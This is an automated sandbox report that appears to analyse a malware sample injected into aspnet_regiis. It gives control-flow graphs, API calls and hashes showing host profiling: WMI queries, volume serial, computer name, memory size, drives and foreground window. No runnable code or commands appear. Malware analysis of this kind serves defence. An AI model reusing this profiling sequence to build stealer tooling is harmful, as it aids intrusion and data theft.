SysAllocString 12054->12056 12057 25daf97 12054->12057 12055->12050 12059 25dad80 12056->12059 12057->12055 12059->12059 12060 25dad94 SysAllocString 12059->12060 12064 25dadb7 12060->12064 12061->12045 12062 25daf81 SysFreeString SysFreeString 12062->12057 12063 25daf77 12063->12062 12064->12062 12064->12063 12065 25dadfb VariantInit 12064->12065 12067 25dae60 12065->12067 12066 25daf66 VariantClear 12066->12063 12067->12066 11864 25cef87 11865 25cef91 11864->11865 11866 25cf0a5 GetPhysicallyInstalledSystemMemory 11865->11866 11867 25cf0c9 11866->11867 11867->11867 12069 25c41a0 12070 25c41f0 12069->12070 12071 25c41ae 12069->12071 12075 25c42b0 12071->12075 12076 25c42c0 12075->12076 12076->12076 12077 25e2530 LdrInitializeThunk 12076->12077 12078 25c439f 12077->12078 12079 25d25a0 CoSetProxyBlanket 11868 25e3580 11869 25e358f 11868->11869 11871 25e366e 11869->11871 11876 25dfac0 LdrInitializeThunk 11869->11876 11872 25e37ae 11871->11872 11874 25e3861 11871->11874 11877 25dfac0 LdrInitializeThunk 11871->11877 11873 25dd1b0 RtlFreeHeap 11872->11873 11873->11874 11876->11871 11877->11872

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 0 25daae0-25dab3f 1 25dab40-25dab73 0->1 1->1 2 25dab75-25dab8c 1->2 4 25dab8e 2->4 5 25dab96-25dabe4 CoCreateInstance 2->5 4->5 6 25dabea-25dac1f 5->6 7 25dafb5-25dafda call 25e1930 GetVolumeInformationW 5->7 9 25dac20-25dac45 6->9 12 25dafdc-25dafdf 7->12 13 25dafe3-25dafe5 7->13 9->9 11 25dac47-25dac79 SysAllocString 9->11 18 25dac7f-25dac99 CoSetProxyBlanket 11->18 19 25dafa1-25dafb1 SysFreeString 11->19 12->13 14 25daffd-25db004 13->14 16 25db006-25db00d 14->16 17 25db010-25db053 call 25c1050 14->17 16->17 25 25db060-25db068 17->25 21 25dac9f-25dacbf 18->21 22 25daf97-25daf9d 18->22 19->7 24 25dacc0-25dad06 21->24 22->19 24->24 26 25dad08-25dad7f SysAllocString 24->26 25->25 28 25db06a-25db078 25->28 27 25dad80-25dad92 26->27 27->27 29 25dad94-25dadb9 SysAllocString 27->29 30 25db07e-25db08e call 25a8600 28->30 31 25daff0-25daff7 28->31 36 25dadbf-25dade1 29->36 37 25daf81-25daf93 SysFreeString * 2 29->37 30->31 31->14 32 25db093-25db09a 31->32 39 25daf77-25daf7d 36->39 40 25dade7-25dadea 36->40 37->22 39->37 40->39 41 25dadf0-25dadf5 40->41 41->39 42 25dadfb-25dae54 VariantInit 41->42 43 25dae60-25dae91 42->43 43->43 44 25dae93-25daea1 43->44 45 25daea5-25daea7 44->45 46 25daead-25daeb3 45->46 47 25daf66-25daf73 VariantClear 45->47 46->47 48 25daeb9-25daec7 46->48 47->39 49 25daefd 48->49 50 25daec9-25daece 48->50 52 25daeff-25daf27 call 25a83e0 call 25d02d0 49->52 51 25daedc-25daee0 50->51 53 25daed0 51->53 54 25daee2-25daeeb 51->54 63 25daf2e-25daf3a 52->63 64 25daf29 52->64 56 25daed1-25daeda 53->56 57 25daeed-25daef0 54->57 58 25daef2-25daef6 54->58 56->51 56->52 57->56 58->56 60 25daef8-25daefb 58->60 60->56 65 25daf3c 63->65 66 25daf41-25daf64 call 25a8410 call 25a83f0 63->66 64->63 65->66 66->47
                                                                                                                                                            APIs
                                                                                                                                                            • CoCreateInstance.OLE32(025E5678,00000000,00000001,025E5668,00000000), ref: 025DABDC
                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 025DAC48
                                                                                                                                                            • CoSetProxyBlanket.COMBASE(899A8F55,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 025DAC91
                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 025DAD0B
                                                                                                                                                            • SysAllocString.OLEAUT32 ref: 025DAD95
                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 025DAE00
                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 025DAF67
                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 025DAF8B
                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 025DAF91
                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 025DAFA5
                                                                                                                                                            • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 025DAFD6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                            • String ID: 2zS$C$HI$Q:$R[$\$dW$e]
                                                                                                                                                            • API String ID: 2573436264-720759029
                                                                                                                                                            • Opcode ID: 77bada706d00b1720ad9a60bd1f826ee79c21f7a8d83f1da96ca4d6a741c8b9c
                                                                                                                                                            • Instruction ID: 23d7de53ca141eacec6164488e98b59add4d87f3f1b71a633cedd707dad4dd74
                                                                                                                                                            • Opcode Fuzzy Hash: 77bada706d00b1720ad9a60bd1f826ee79c21f7a8d83f1da96ca4d6a741c8b9c
                                                                                                                                                            • Instruction Fuzzy Hash: C2E1FCB5A083419FE7208F28CC85B1BBBE5FB85718F04892CF6919B280D7B4D905CB96
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: $).)($2$<=$qt$xO
                                                                                                                                                            • API String ID: 0-2945988728
                                                                                                                                                            • Opcode ID: 32959cd4a59c81fb8301569ca6fa64d5b4aa46bb40b6269bcc64a8200663dfb0
                                                                                                                                                            • Instruction ID: 98a4f30c6d6e5597275e12c3f1023bfa61415e0829c1f8ad80e24c67f43bdd99
                                                                                                                                                            • Opcode Fuzzy Hash: 32959cd4a59c81fb8301569ca6fa64d5b4aa46bb40b6269bcc64a8200663dfb0
                                                                                                                                                            • Instruction Fuzzy Hash: 2192CFB1909381CBD7358F28D8A57EBBBE1FF85314F14492CD4C98B291EB349915CB8A

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 462 25c6618-25c661e 463 25c6627 462->463 464 25c6620-25c6625 462->464 465 25c662a-25c664a call 25a83e0 463->465 464->465 469 25c6659-25c6662 465->469 470 25c6651 465->470 471 25c666b 469->471 472 25c6664-25c6669 469->472 470->469 473 25c6672-25c66bb call 25a83e0 471->473 472->473 476 25c66c0-25c6722 473->476 476->476 477 25c6724-25c672f 476->477 478 25c6751-25c675e 477->478 479 25c6731-25c6739 477->479 481 25c6760-25c6764 478->481 482 25c6781-25c678c call 25e2530 478->482 480 25c6740-25c674f 479->480 480->478 480->480 483 25c6770-25c677f 481->483 485 25c6791-25c6799 482->485 483->482 483->483 486 25c6a7d-25c6a95 485->486 487 25c6b7d 485->487 488 25c694f-25c6a07 485->488 489 25c6928-25c6932 485->489 490 25c693a 485->490 491 25c67b6-25c67bf 485->491 492 25c67a6-25c67ad 485->492 493 25c67a0 485->493 494 25c6940-25c6946 call 25a83f0 485->494 495 25c6aa0-25c6ab2 486->495 502 25c6b83 487->502 499 25c6a10-25c6a5b 488->499 489->490 490->494 496 25c67c8 491->496 497 25c67c1-25c67c6 491->497 492->491 493->492 494->488 495->495 500 25c6ab4-25c6b3f 495->500 501 25c67cf-25c6878 call 25a83e0 496->501 497->501 499->499 504 25c6a5d-25c6a75 call 25c4860 499->504 505 25c6b40-25c6b54 500->505 513 25c6880-25c68a6 501->513 511 25c6b89-25c6b92 call 25a83f0 502->511 504->486 505->505 509 25c6b56-25c6b75 call 25c43f0 505->509 509->487 520 25c6ba0-25c6ba6 call 25a83f0 511->520 513->513 516 25c68a8-25c68b3 513->516 518 25c68b5-25c68bf 516->518 519 25c68d1-25c68de 516->519 521 25c68c0-25c68cf 518->521 523 25c68e0-25c68e4 519->523 524 25c6901-25c6921 GetLogicalDrives call 25e2530 519->524 529 25c6baf 520->529 521->519 521->521 525 25c68f0-25c68ff 523->525 524->486 524->487 524->489 524->490 524->494 524->502 524->511 524->520 524->529 530 25c6bb5-25c6bbd call 25a83f0 524->530 531 25c6bc0-25c6bcc 524->531 525->524 525->525 529->530 530->531
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: I=[;$\]$k8i$sq$wu
                                                                                                                                                            • API String ID: 0-747998150
                                                                                                                                                            • Opcode ID: c5e3c36b73dc91c6915b55087ca9fa36f8b259037e104fab622fbfab396f25bb
                                                                                                                                                            • Instruction ID: 8a428301c91352e71cbae1931f6b70cd726b0a3c6c1927ca5709d20799134232
                                                                                                                                                            • Opcode Fuzzy Hash: c5e3c36b73dc91c6915b55087ca9fa36f8b259037e104fab622fbfab396f25bb
                                                                                                                                                            • Instruction Fuzzy Hash: 40D1C9B0508340CFD7009FA9E89166BBBF4FF86754F148A2CF5958B251E778C909CB8A

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 534 25a8c70-25a8c81 call 25de700 537 25a8e47-25a8e49 ExitProcess 534->537 538 25a8c87-25a8c9f SHGetSpecialFolderPathW call 25d7a70 534->538 541 25a8e42 call 25dfa10 538->541 542 25a8ca5-25a8cc3 GetCurrentThreadId 538->542 541->537 544 25a8cc7-25a8cd2 542->544 545 25a8cc5 542->545 546 25a8cd6-25a8ce5 544->546 547 25a8cd4 544->547 545->544 548 25a8ce9-25a8cf4 546->548 549 25a8ce7 546->549 547->546 550 25a8cf8-25a8da2 GetCurrentProcessId GetForegroundWindow 548->550 551 25a8cf6 548->551 549->548 552 25a8e1e-25a8e36 call 25aa020 550->552 553 25a8da4-25a8e14 550->553 551->550 552->541 558 25a8e38 call 25ad2b0 552->558 554 25a8e1a-25a8e1c 553->554 555 25a8e16-25a8e18 553->555 554->552 555->554 560 25a8e3d call 25ab930 558->560 560->541
                                                                                                                                                            APIs
                                                                                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 025A8C92
                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 025A8CA5
                                                                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 025A8CF8
                                                                                                                                                            • GetForegroundWindow.USER32 ref: 025A8D9A
                                                                                                                                                            • ExitProcess.KERNEL32 ref: 025A8E49
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4063528623-0
                                                                                                                                                            • Opcode ID: b694cfa602d50dc4b57ea083d14a5cd86c6de87cfe5b4a73bfe61080f21ebf33
                                                                                                                                                            • Instruction ID: 0e3711285d65ca6cded806864fcb9980354ca8e071967567becfbf2681363752
                                                                                                                                                            • Opcode Fuzzy Hash: b694cfa602d50dc4b57ea083d14a5cd86c6de87cfe5b4a73bfe61080f21ebf33
                                                                                                                                                            • Instruction Fuzzy Hash: A6419E37B0031C5BD714ADB9DD6B39EBAC66BC4214F4A4428AE84DF391FDB98C0586C8

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 562 25ce398-25ce3c5 563 25ce3d0-25ce411 562->563 563->563 564 25ce413-25ce41f 563->564 565 25ce43b-25cefbf 564->565 566 25ce421-25ce427 564->566 569 25cefc0-25cf02e 565->569 567 25ce430-25ce439 566->567 567->565 567->567 569->569 570 25cf030-25cf039 569->570 571 25cf05d 570->571 572 25cf03b-25cf044 570->572 574 25cf060-25cf06c 571->574 573 25cf050-25cf059 572->573 573->573 575 25cf05b 573->575 576 25cf06e 574->576 577 25cf081-25cf0a0 call 25e1930 574->577 575->574 579 25cf070-25cf07d 576->579 581 25cf0a5-25cf0c4 GetPhysicallyInstalledSystemMemory call 25c1050 577->581 579->579 580 25cf07f 579->580 580->577 583 25cf0c9-25cf0ef 581->583 584 25cf0f0-25cf132 583->584 584->584 585 25cf134-25cf16f 584->585 586 25cf170-25cf195 585->586 586->586 587 25cf197-25cf1a0 586->587 588 25cf1bd 587->588 589 25cf1a2-25cf1ab 587->589 591 25cf1c0-25cf1ca 588->591 590 25cf1b0-25cf1b9 589->590 590->590 592 25cf1bb 590->592 593 25cf1cc-25cf1cf 591->593 594 25cf1db-25cf1e7 591->594 592->591 595 25cf1d0-25cf1d9 593->595 596 25cf1e9-25cf1ef 594->596 597 25cf1fb-25cf25b 594->597 595->594 595->595 598 25cf1f0-25cf1f9 596->598 599 25cf260-25cf2ad 597->599 598->597 598->598 599->599 600 25cf2af-25cf2b8 599->600 601 25cf2ba 600->601 602 25cf2cb-25cf2d7 600->602 603 25cf2c0-25cf2c9 601->603 604 25cf2d9-25cf2df 602->604 605 25cf2eb-25cf380 602->605 603->602 603->603 606 25cf2e0-25cf2e9 604->606 606->605 606->606
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: hzQ$A0*#$_mQ#
                                                                                                                                                            • API String ID: 0-649192675
                                                                                                                                                            • Opcode ID: 270d81a0aa28390c8f75e97e39fba1fa8e47bcbd5d76d51cbf7403d394708f61
                                                                                                                                                            • Instruction ID: a2707e1c75431ee8d1336938aafe75eafc1579a2281ca0eb4dc17440c335877d
                                                                                                                                                            • Opcode Fuzzy Hash: 270d81a0aa28390c8f75e97e39fba1fa8e47bcbd5d76d51cbf7403d394708f61
                                                                                                                                                            • Instruction Fuzzy Hash: 4ED1E771604B818FD729CF35C4A07A3BFE3AF96204F1889AEC4DB8B646D77964058B14

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 607 25cef87-25cefbf call 25d4ef0 call 25a83f0 613 25cefc0-25cf02e 607->613 613->613 614 25cf030-25cf039 613->614 615 25cf05d 614->615 616 25cf03b-25cf044 614->616 618 25cf060-25cf06c 615->618 617 25cf050-25cf059 616->617 617->617 619 25cf05b 617->619 620 25cf06e 618->620 621 25cf081-25cf0c4 call 25e1930 GetPhysicallyInstalledSystemMemory call 25c1050 618->621 619->618 623 25cf070-25cf07d 620->623 627 25cf0c9-25cf0ef 621->627 623->623 624 25cf07f 623->624 624->621 628 25cf0f0-25cf132 627->628 628->628 629 25cf134-25cf16f 628->629 630 25cf170-25cf195 629->630 630->630 631 25cf197-25cf1a0 630->631 632 25cf1bd 631->632 633 25cf1a2-25cf1ab 631->633 635 25cf1c0-25cf1ca 632->635 634 25cf1b0-25cf1b9 633->634 634->634 636 25cf1bb 634->636 637 25cf1cc-25cf1cf 635->637 638 25cf1db-25cf1e7 635->638 636->635 639 25cf1d0-25cf1d9 637->639 640 25cf1e9-25cf1ef 638->640 641 25cf1fb-25cf25b 638->641 639->638 639->639 642 25cf1f0-25cf1f9 640->642 643 25cf260-25cf2ad 641->643 642->641 642->642 643->643 644 25cf2af-25cf2b8 643->644 645 25cf2ba 644->645 646 25cf2cb-25cf2d7 644->646 647 25cf2c0-25cf2c9 645->647 648 25cf2d9-25cf2df 646->648 649 25cf2eb-25cf380 646->649 647->646 647->647 650 25cf2e0-25cf2e9 648->650 650->649 650->650
                                                                                                                                                            APIs
                                                                                                                                                            • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 025CF0AC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                            • String ID: hzQ$A0*#$_mQ#
                                                                                                                                                            • API String ID: 3960555810-649192675
                                                                                                                                                            • Opcode ID: ccff9a45c17a90b7f7666200b67252d975765c9eba45a75834f7f82c294336bf
                                                                                                                                                            • Instruction ID: e6203ac5bdbb04df54f5c8bf1a8d1374e1eac701317c123fd6087df7f7167844
                                                                                                                                                            • Opcode Fuzzy Hash: ccff9a45c17a90b7f7666200b67252d975765c9eba45a75834f7f82c294336bf
                                                                                                                                                            • Instruction Fuzzy Hash: 85B1C571604B818FD739CF39C4617A3BBE2AF96204F18896EC0DB9B682D779A105CB54

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 753 25cf3ed-25cf448 call 25e1930 GetComputerNameExA 756 25cf450-25cf4a7 753->756 756->756 757 25cf4a9-25cf4b2 756->757 758 25cf4cd 757->758 759 25cf4b4-25cf4bf 757->759 760 25cf4d0-25cf4dc 758->760 761 25cf4c0-25cf4c9 759->761 762 25cf4de-25cf4e4 760->762 763 25cf4fb-25cf55a GetComputerNameExA 760->763 761->761 764 25cf4cb 761->764 765 25cf4f0-25cf4f9 762->765 766 25cf560-25cf595 763->766 764->760 765->763 765->765 766->766 767 25cf597-25cf5a0 766->767 768 25cf5bb-25cf5c7 767->768 769 25cf5a2-25cf5a8 767->769 771 25cf5c9-25cf5cf 768->771 772 25cf5db-25cf63b 768->772 770 25cf5b0-25cf5b9 769->770 770->768 770->770 773 25cf5d0-25cf5d9 771->773 775 25cf640-25cf667 772->775 773->772 773->773 775->775 776 25cf669-25cf672 775->776 777 25cf68d 776->777 778 25cf674-25cf67f 776->778 780 25cf68f-25cf69b 777->780 779 25cf680-25cf689 778->779 779->779 781 25cf68b 779->781 782 25cf69d-25cf6a3 780->782 783 25cf6bb-25cf71a call 25e1930 780->783 781->780 784 25cf6b0-25cf6b9 782->784 788 25cf720-25cf73a 783->788 784->783 784->784 788->788 789 25cf73c-25cf745 788->789 790 25cf75b-25cf76b 789->790 791 25cf747-25cf74f 789->791 792 25cf880-25cf8c9 790->792 793 25cf771-25cf77b 790->793 794 25cf750-25cf759 791->794 796 25cf8d0-25cf8fb 792->796 795 25cf780-25cf78a 793->795 794->790 794->794 797 25cf78c-25cf791 795->797 798 25cf7a0-25cf7a6 795->798 796->796 799 25cf8fd-25cf90b 796->799 800 25cf830-25cf834 797->800 801 25cf7a8-25cf7ab 798->801 802 25cf7d0-25cf7df 798->802 803 25cf90d-25cf913 799->803 804 25cf92b-25cf931 call 25d3610 799->804 810 25cf836-25cf83e 800->810 801->802 805 25cf7ad-25cf7c2 801->805 807 25cf84a-25cf852 802->807 808 25cf7e1-25cf7e4 802->808 806 25cf920-25cf929 803->806 812 25cf936-25cf955 804->812 805->800 806->804 806->806 807->810 814 25cf854-25cf857 807->814 808->807 811 25cf7e6-25cf82f 808->811 810->792 813 25cf840-25cf842 810->813 811->800 813->795 817 25cf848 813->817 815 25cf87c-25cf87e 814->815 816 25cf859-25cf87a 814->816 815->800 816->800 817->792
                                                                                                                                                            APIs
                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 025CF41E
                                                                                                                                                            • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 025CF51B
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ComputerName
                                                                                                                                                            • String ID: Y)|z
                                                                                                                                                            • API String ID: 3545744682-2475117699
                                                                                                                                                            • Opcode ID: 9d086ecd03d51b26a53d73531764c80552642a5bd81f9849140140032493ea62
                                                                                                                                                            • Instruction ID: 3da4a6b3bb7af4b38f18f1bb8af163fcb35aaddf141ed1f81e552018f261a5f5
                                                                                                                                                            • Opcode Fuzzy Hash: 9d086ecd03d51b26a53d73531764c80552642a5bd81f9849140140032493ea62
                                                                                                                                                            • Instruction Fuzzy Hash: E5E10A20605B818EE725CF39C4517B3BFE2AF57304F18995EC0EB8B682E779A109CB55

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 862 25ada8d-25adad2 call 25d54c0 call 25a9ae0 CoUninitialize 867 25adae0-25adb0e 862->867 867->867 868 25adb10-25adb3b 867->868 869 25adb40-25adb76 868->869 869->869 870 25adb78-25adbe9 869->870 871 25adbf0-25adc39 870->871 871->871 872 25adc3b-25adc4c 871->872 873 25adc6b-25adc73 872->873 874 25adc4e-25adc5f 872->874 876 25adc8d 873->876 877 25adc75-25adc7a 873->877 875 25adc60-25adc69 874->875 875->873 875->875 879 25adc91-25adc9e 876->879 878 25adc80-25adc89 877->878 878->878 882 25adc8b 878->882 880 25adcbb-25adcc3 879->880 881 25adca0-25adca7 879->881 884 25adcdb-25adce5 880->884 885 25adcc5-25adcc6 880->885 883 25adcb0-25adcb9 881->883 882->879 883->880 883->883 887 25adcfb-25add07 884->887 888 25adce7-25adceb 884->888 886 25adcd0-25adcd9 885->886 886->884 886->886 890 25add09-25add0b 887->890 891 25add21-25ade4f 887->891 889 25adcf0-25adcf9 888->889 889->887 889->889 892 25add10-25add1d 890->892 893 25ade50-25ade8e 891->893 892->892 894 25add1f 892->894 893->893 895 25ade90-25adebb 893->895 894->891 896 25adec0-25adedf 895->896 896->896 897 25adee1-25adf0b call 25ab960 896->897 899 25adf10-25adf2a 897->899
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Uninitialize
                                                                                                                                                            • String ID: ~
                                                                                                                                                            • API String ID: 3861434553-1707062198
                                                                                                                                                            • Opcode ID: 9aec6a69ca91bb839414fa67a90ec6a04043da2df9175eca71c9f0912757a1f2
                                                                                                                                                            • Instruction ID: 93c763ff07c78c7e6a567f89c3986dba86fd67cfc6f560ff70e870374447407e
                                                                                                                                                            • Opcode Fuzzy Hash: 9aec6a69ca91bb839414fa67a90ec6a04043da2df9175eca71c9f0912757a1f2
                                                                                                                                                            • Instruction Fuzzy Hash: 9DB1207550E3D18AD334DF29C4A83ABBFE1AFD6308F18495CC4D95B242DB78850ACB96
                                                                                                                                                            APIs
                                                                                                                                                            • LdrInitializeThunk.NTDLL(025DD9CC,?,00000004,?), ref: 025DFAEE
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                                                                                                                                            • Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                            • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
